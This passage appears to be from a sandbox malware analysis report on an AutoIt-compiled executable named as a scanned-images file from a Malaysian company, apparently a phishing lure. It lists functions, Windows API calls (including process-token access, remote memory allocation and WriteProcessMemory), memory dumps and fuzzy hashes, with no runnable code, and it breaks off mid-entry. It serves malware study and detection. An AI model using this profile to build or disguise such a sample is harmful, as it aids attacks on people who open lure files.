                                                          • Part of subcall function 00A212F3: SelectObject.GDI32(?,00000000), ref: 00A2139C
                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00AAC030
                                                        • LineTo.GDI32(00000000,?,?), ref: 00AAC03D
                                                        • EndPath.GDI32(00000000), ref: 00AAC04D
                                                        • StrokePath.GDI32(00000000), ref: 00AAC05B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                        • String ID:
                                                        • API String ID: 1539411459-0
                                                        • Opcode ID: c3edc165dfdd27788d171800ede9315de6114088645417ec738b6e5bb73f76e0
                                                        • Instruction ID: a2af7a1573f08167e902cccc821864bee46a5792492b18065fb829c9a195a9ec
                                                        • Opcode Fuzzy Hash: c3edc165dfdd27788d171800ede9315de6114088645417ec738b6e5bb73f76e0
                                                        • Instruction Fuzzy Hash: B6F05E3100125AFBDB22AFD4AC09FCE3F59AF16321F044010FA11650E287B55552CFD5
                                                        Function 00A7A37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00A7A399
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00A7A3AC
                                                        • GetCurrentThreadId.KERNEL32 ref: 00A7A3B3
                                                        • AttachThreadInput.USER32(00000000), ref: 00A7A3BA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                        • String ID:
                                                        • API String ID: 2710830443-0
                                                        • Opcode ID: 5fc231f737b235743868f5efb0f4eedf9aee42997efb327f1ff258f6f9a0e770
                                                        • Instruction ID: 6c2b5a1dcccf28e67be6d26eea260031f00a8a44cfb9493b0b3f0948244148a3
                                                        • Opcode Fuzzy Hash: 5fc231f737b235743868f5efb0f4eedf9aee42997efb327f1ff258f6f9a0e770
                                                        • Instruction Fuzzy Hash: 24E0C931545269BADB249FE2DC0DEEB7F5CEF267A2F00C025F609990A0C7718541DBA1
                                                        Function 00A22218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSysColor.USER32(00000008), ref: 00A22231
                                                        • SetTextColor.GDI32(?,000000FF), ref: 00A2223B
                                                        • SetBkMode.GDI32(?,00000001), ref: 00A22250
                                                        • GetStockObject.GDI32(00000005), ref: 00A22258
                                                        • GetWindowDC.USER32(?,00000000), ref: 00A5C0D3
                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00A5C0E0
                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 00A5C0F9
                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 00A5C112
                                                        • GetPixel.GDI32(00000000,?,?), ref: 00A5C132
                                                        • ReleaseDC.USER32(?,00000000), ref: 00A5C13D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                        • String ID:
                                                        • API String ID: 1946975507-0
                                                        • Opcode ID: 20575bcda3d9e1e1b9236d7a1a4aea184cd79ef425908590e019d94961e6681c
                                                        • Instruction ID: c757ed7a09b088dd03d97683decfa2c78011f870819573f4a71fb662f04ebae6
                                                        • Opcode Fuzzy Hash: 20575bcda3d9e1e1b9236d7a1a4aea184cd79ef425908590e019d94961e6681c
                                                        • Instruction Fuzzy Hash: F7E03932600245EEDB259FE8FC097D83B10EB16332F008376FB69480E587724985DB22
                                                        Function 00A78C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThread.KERNEL32 ref: 00A78C63
                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,00A7882E), ref: 00A78C6A
                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00A7882E), ref: 00A78C77
                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,00A7882E), ref: 00A78C7E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CurrentOpenProcessThreadToken
                                                        • String ID:
                                                        • API String ID: 3974789173-0
                                                        • Opcode ID: da96f3b1ad9ac28777ef2620351c2600edc57e5c94ce74773ef35965c8e362cc
                                                        • Instruction ID: 8f9185d614c1e613040836b7cb243569632d720a81ec1e3093e44f3fb7b7f43f
                                                        • Opcode Fuzzy Hash: da96f3b1ad9ac28777ef2620351c2600edc57e5c94ce74773ef35965c8e362cc
                                                        • Instruction Fuzzy Hash: 1FE08636742212DFD7649FF16D0CB973BACEF52792F088828B645C90C0EB388446CB61
                                                        Function 00A62187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDesktopWindow.USER32 ref: 00A62187
                                                        • GetDC.USER32(00000000), ref: 00A62191
                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A621B1
                                                        • ReleaseDC.USER32(?), ref: 00A621D2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                        • String ID:
                                                        • API String ID: 2889604237-0
                                                        • Opcode ID: b8f1fd207832446fc2b8f1dd1decaed729850e37a5bef338a3b92afe637bb92d
                                                        • Instruction ID: c682c12b1ba8c7dbd4ba87863a161408b949b03f7f8b33eb18a4bf433cffcf5a
                                                        • Opcode Fuzzy Hash: b8f1fd207832446fc2b8f1dd1decaed729850e37a5bef338a3b92afe637bb92d
                                                        • Instruction Fuzzy Hash: 44E01A75800615EFDB159FE4D908A9DBBF1EB4D351F108425FD5A972A0DB3881429F40
                                                        Function 00A6219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDesktopWindow.USER32 ref: 00A6219B
                                                        • GetDC.USER32(00000000), ref: 00A621A5
                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A621B1
                                                        • ReleaseDC.USER32(?), ref: 00A621D2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                        • String ID:
                                                        • API String ID: 2889604237-0
                                                        • Opcode ID: 070121bf3185a9dc48bc381d720b44084ad5bdf442815292090cff6e58330327
                                                        • Instruction ID: 2740071906a4b6d1a678457d1eb57286a6110f9fc3aa9b24e14e308c93a3bdc0
                                                        • Opcode Fuzzy Hash: 070121bf3185a9dc48bc381d720b44084ad5bdf442815292090cff6e58330327
                                                        • Instruction Fuzzy Hash: 41E012B5C00216AFCB259FF4D90869EBBF1EB4D361F108029F95AA72A0DB3891429F40
                                                        Function 00A7B7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 00A7B981
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ContainedObject
                                                        • String ID: AutoIt3GUI$Container
                                                        • API String ID: 3565006973-3941886329
                                                        • Opcode ID: 4521131cbb924108471bce4d3ce2c6e626ecb08fbf6f05d9c0936e6e66df64b4
                                                        • Instruction ID: d162393bb156f06b143b33a06c998116267774a2a1ed9b4fc110666d979b23e0
                                                        • Opcode Fuzzy Hash: 4521131cbb924108471bce4d3ce2c6e626ecb08fbf6f05d9c0936e6e66df64b4
                                                        • Instruction Fuzzy Hash: 45913AB4610601AFDB24DF68C884B6AB7F9FF48710F14C56EE94ACB691DB70E840CB60
                                                        Function 00A8B217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A3FEC6: _wcscpy.LIBCMT ref: 00A3FEE9
                                                          • Part of subcall function 00A29997: __itow.LIBCMT ref: 00A299C2
                                                          • Part of subcall function 00A29997: __swprintf.LIBCMT ref: 00A29A0C
                                                        • __wcsnicmp.LIBCMT ref: 00A8B298
                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00A8B361
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                        • String ID: LPT
                                                        • API String ID: 3222508074-1350329615
                                                        • Opcode ID: f0aa2ab85e16c9a4c88adc2fd7f84f19ddfdd43a2b4c61cf97e6fba1dfa295f0
                                                        • Instruction ID: a7c80d5cae09364014be8a894efa8ab162a42645902c87a64d55852f0a2375dc
                                                        • Opcode Fuzzy Hash: f0aa2ab85e16c9a4c88adc2fd7f84f19ddfdd43a2b4c61cf97e6fba1dfa295f0
                                                        • Instruction Fuzzy Hash: BC618475E10215EFCB14EF98C985EAEB7B4EF08710F15446AF546AB391DB70AE80CB60
                                                        Function 00A32AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNEL32(00000000), ref: 00A32AC8
                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 00A32AE1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemorySleepStatus
                                                        • String ID: @
                                                        • API String ID: 2783356886-2766056989
                                                        • Opcode ID: 58f63da3a8b2d4848e96303e540c1e13af15031f09fd729aaa8565f6fb3da5dc
                                                        • Instruction ID: eb6e4c781bfd4544e1f784a31d36096ca5572515560c473842289d9c4a1f5c2e
                                                        • Opcode Fuzzy Hash: 58f63da3a8b2d4848e96303e540c1e13af15031f09fd729aaa8565f6fb3da5dc
                                                        • Instruction Fuzzy Hash: 085149714187549BD320AF54EC86BAFBBE8FF84710F42486DF1D9811A5DB30892ACB26
                                                        Function 00A899BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A2506B: __fread_nolock.LIBCMT ref: 00A25089
                                                        • _wcscmp.LIBCMT ref: 00A89AAE
                                                        • _wcscmp.LIBCMT ref: 00A89AC1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _wcscmp$__fread_nolock
                                                        • String ID: FILE
                                                        • API String ID: 4029003684-3121273764
                                                        • Opcode ID: 7fcd0d810acb7a1bbf3e6e79424224d46a66d49802db7106c33e30944b342278
                                                        • Instruction ID: 2a134a8fafddf7ed2dcc282c2dd510a4af06135b307aecce6c9aa9f365192789
                                                        • Opcode Fuzzy Hash: 7fcd0d810acb7a1bbf3e6e79424224d46a66d49802db7106c33e30944b342278
                                                        • Instruction Fuzzy Hash: F641C471A04619BEDF20ABB4DC45FEFBBBDEF49710F04047AF904A7181DA75AA0487A1
                                                        Function 00A92882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A92892
                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00A928C8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CrackInternet_memset
                                                        • String ID: |
                                                        • API String ID: 1413715105-2343686810
                                                        • Opcode ID: 5a4284a0ac1627be37b6c3c16911ae05c6f864ec83cab891616eae0cfc2945b4
                                                        • Instruction ID: 4e50c8aaf35cb37d512ed7dd60b645a3bd03d5210efe8565ce1092a1e3eeee6c
                                                        • Opcode Fuzzy Hash: 5a4284a0ac1627be37b6c3c16911ae05c6f864ec83cab891616eae0cfc2945b4
                                                        • Instruction Fuzzy Hash: D2314B71900119AFCF05EFA5DD85EEEBFB9FF08300F104029F815AA166EB315A56DBA0
                                                        Function 00AA6CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00AA6D86
                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00AA6DC2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Window$DestroyMove
                                                        • String ID: static
                                                        • API String ID: 2139405536-2160076837
                                                        • Opcode ID: c732cffd221ec66ae8ac9c029558322397e36c7e869641f4957c148644ba0f34
                                                        • Instruction ID: 23bc84c4db314efadf3cae095a786d743f76cb51efaf0eeaa09c55d41f1f2e27
                                                        • Opcode Fuzzy Hash: c732cffd221ec66ae8ac9c029558322397e36c7e869641f4957c148644ba0f34
                                                        • Instruction Fuzzy Hash: 9F31AD71210604AEDB10DF78CC80AFB77B9FF49760F148629F9A697190DB31AC92CB60
                                                        Function 00A82D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A82E00
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00A82E3B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: InfoItemMenu_memset
                                                        • String ID: 0
                                                        • API String ID: 2223754486-4108050209
                                                        • Opcode ID: f32704f1f3bb88d0d7fd405fffc65d9d8b033f70073f5df34b80ee00bb75d5cf
                                                        • Instruction ID: e4f881f8999d364461d17a72d8385f034b3de629a9b315dabbea98a09e828f5e
                                                        • Opcode Fuzzy Hash: f32704f1f3bb88d0d7fd405fffc65d9d8b033f70073f5df34b80ee00bb75d5cf
                                                        • Instruction Fuzzy Hash: 5131E431A00309AFEB24EF58C985BBEBFB9FF45350F14442AE985971A0E7709944CB58
                                                        Function 00A7AFDC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A3619A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00A361B1
                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00A7B03B
                                                        • _strlen.LIBCMT ref: 00A7B046
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Timeout_strlen
                                                        • String ID: @U=u
                                                        • API String ID: 2777139624-2594219639
                                                        • Opcode ID: 503ab80b42aeb92ab3bf54a64d19444dec7a458d6804c9643a6cd294721790c7
                                                        • Instruction ID: 081cb133ba0378431c36d7ed9fd1d41cec4a147c0019630b97ae37f13af18751
                                                        • Opcode Fuzzy Hash: 503ab80b42aeb92ab3bf54a64d19444dec7a458d6804c9643a6cd294721790c7
                                                        • Instruction Fuzzy Hash: 8F11D5B62142056ACB14AB78DDD6BBF7BA99F85300F00C03EF609DB193DF258D868270
                                                        Function 00AA6AD4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 76windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A8589F: GetLocalTime.KERNEL32 ref: 00A858AC
                                                          • Part of subcall function 00A8589F: _wcsncpy.LIBCMT ref: 00A858E1
                                                          • Part of subcall function 00A8589F: _wcsncpy.LIBCMT ref: 00A85913
                                                          • Part of subcall function 00A8589F: _wcsncpy.LIBCMT ref: 00A85946
                                                          • Part of subcall function 00A8589F: _wcsncpy.LIBCMT ref: 00A85988
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AA6B6E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _wcsncpy$LocalMessageSendTime
                                                        • String ID: @U=u$SysDateTimePick32
                                                        • API String ID: 2466184910-2530228043
                                                        • Opcode ID: 49e8ebaf1943ea225bcfe2cdeb3fbee6d9f7fd57b219282e9174543f7d861870
                                                        • Instruction ID: 41a56ae7fc254cdd5027f0f66d93d4037d870b5c8901e2bc3c4f7e61475ed033
                                                        • Opcode Fuzzy Hash: 49e8ebaf1943ea225bcfe2cdeb3fbee6d9f7fd57b219282e9174543f7d861870
                                                        • Instruction Fuzzy Hash: 8921E431380208AFEF219F64CC82FEA7369EB55760F144519F950EB1D0D7B1AC418BA0
                                                        Function 00A79707 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A79720
                                                          • Part of subcall function 00A818EE: GetWindowThreadProcessId.USER32(?,?), ref: 00A81919
                                                          • Part of subcall function 00A818EE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00A7973C,00000034,?,?,00001004,00000000,00000000), ref: 00A81929
                                                          • Part of subcall function 00A818EE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00A7973C,00000034,?,?,00001004,00000000,00000000), ref: 00A8193F
                                                          • Part of subcall function 00A819CC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A79778,?,?,00000034,00000800,?,00000034), ref: 00A819F6
